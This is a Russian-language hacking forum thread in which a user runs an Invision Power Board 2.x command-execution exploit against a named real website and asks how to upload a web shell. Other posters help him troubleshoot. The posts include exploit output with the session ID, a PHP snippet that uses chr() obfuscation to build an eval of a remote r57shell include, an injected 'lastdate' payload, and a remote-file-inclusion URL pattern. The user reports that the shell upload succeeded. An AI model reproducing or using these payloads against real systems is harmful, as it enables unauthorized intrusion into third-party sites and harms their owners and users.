Даже дошёл как в фильме :))

G:\Documents and Settings\Denis>g:\perll\bin\perl.exe g:\s.pl -h www.uo.cln.ru -
d /forum/ -l zxc -p zxc -f 2 -v 0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~
Invision Power Board 2.* commands execution exploit by RST/GHC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~
[~] SERVER : www.uo.cln.ru
[~] PATH : /forum/
[~] LOGIN : zxc
[~] PASSWORD : zxc
[~] TARGET : 0 - IPB 2.0.*
[~] Login ... [ DONE ]
[+] SID: 2cd54daebe2bd7d5b888ae5c3dabf720
[~] Try get md5_check ... [ DONE ]
[+] MD5_CHECK : bb429f6b6c7f8483343bff5eadff165f
[~] Create new message ... [ DONE ]
[~] Search message ... [ DONE ]
[+] SEARCHID: 5ea7c66e3bf5630885947ad97478cbf0


НУ а дальше то что делать? Что можно украсть? Что за удалённые команды, помогайте :)

Господа, теперь меня интересует дополнительный вопрос, только что просмотрел мувик : http://rapidshare.de/files/19287127/video.rar.html

Вот я не понял как он шелл заливает? Предварительно шелл нуна загрузить куда нить?

Содержание qw.php :

<?php
$str="include \"http://rst.void.ru/download/r57shell.txt\";/*";// */
echo "eval( ";
for($i=0;$i<strlen($str);$i++)
{
echo "chr(".ord($str[$i])."). ";
}
echo "chr(".ord(" ").") ); //";
?>

Так вот этот qw.php нужно куда то грузить? А то я с мувика мало понял - как он вообще так умудрился загрузить? Я сделал всё как он, регнулся, создал топ, нашёл себя, добавляю код который в ридми есть :

Добавим добавку от хака
&lastdate=z|eval.*?%20//)%23e%00

Но шелл не подгружается. Помогите, почему?


updated : знач все кто видел мувик : http://rapidshare.de/files/19287127/video.rar.html

вот я делал также, снял мувик, но делал все точка в точку, и нифига не вышло, ацените мой мувик, (800 кб), и скажите что не так? Вот оно обновляется, но шелла почемуто не загружает!

мой фильм ;)

http://rapidshare.de/files/25150878/help.rar.html

Вообщем не совсем тебя понял!
_http://rst.void.ru/download/r57shell.txt
Вот этот шелл зачем заливать? Он вообще то присоединяется(приклеивае� �ся) типа: _http://site/index.php?page=http://rst.void.ru/download/r57shell.txt. Для заливки используй
remview _http://php.spb.ru/remview/.
Если права на папку выставленны, то ни какой шелл ты не закачаешь.
Ты хоть какие-нибудь команды выполнял типа ls, pwd, cat.... Щас видео посмотрю...

Посмотрел...
На форуме версия 2.1.6, а в ReaMe написано про уязвимость версий <=2.1.5.
Так что вряд ли прокатит!
А вообще с закачкой шелла ты врядли преуспеешь я не думаю что админы этого сайта-форума дураки, чтобы не выставить права! В форуме "Уязвимости форумов" уже упомянули про версию 2.1.6, так что поюзай!

да же бы если была версия 2.1.5 ты бы шелл не загрузил потомучто ты когда нажал "Search"
у тебя автоматом стояло
"Результаты в виде тем"
а надо было :
"Результаты в виде сообщений" ;)
:)

Посмотрел...
На форуме версия 2.1.6, а в ReaMe написано про уязвимость версий <=2.1.5.
Так что вряд ли прокатит!
А вообще с закачкой шелла ты врядли преуспеешь я не думаю что админы этого сайта-форума дураки, чтобы не выставить права! В форуме "Уязвимости форумов" уже упомянули про версию 2.1.6, так что поюзай!


Как это 2.1.6? 2.1.4! Посмотри еще раз!

Команды делал но 0 реакции - он думает потом скидует на первоночальную строку... дайте КОНКРЕТНЫЕ КОМАНДЫ =)

Обана, прокатило, спасибо большое. Отличная помощь друзья.

Как это 2.1.6? 2.1.4! Посмотри еще раз!

Команды делал но 0 реакции - он думает потом скидует на первоночальную строку... дайте КОНКРЕТНЫЕ КОМАНДЫ =)


Как это 2.1.4 :confused:


На твоём видео своими глазами видел 2.1.6 !!!!!

Да, ты прав, но ошибка там была, заметил? Дырка точнее. Но всё равно, благодоря Химасу, у меня получилось залить шелл.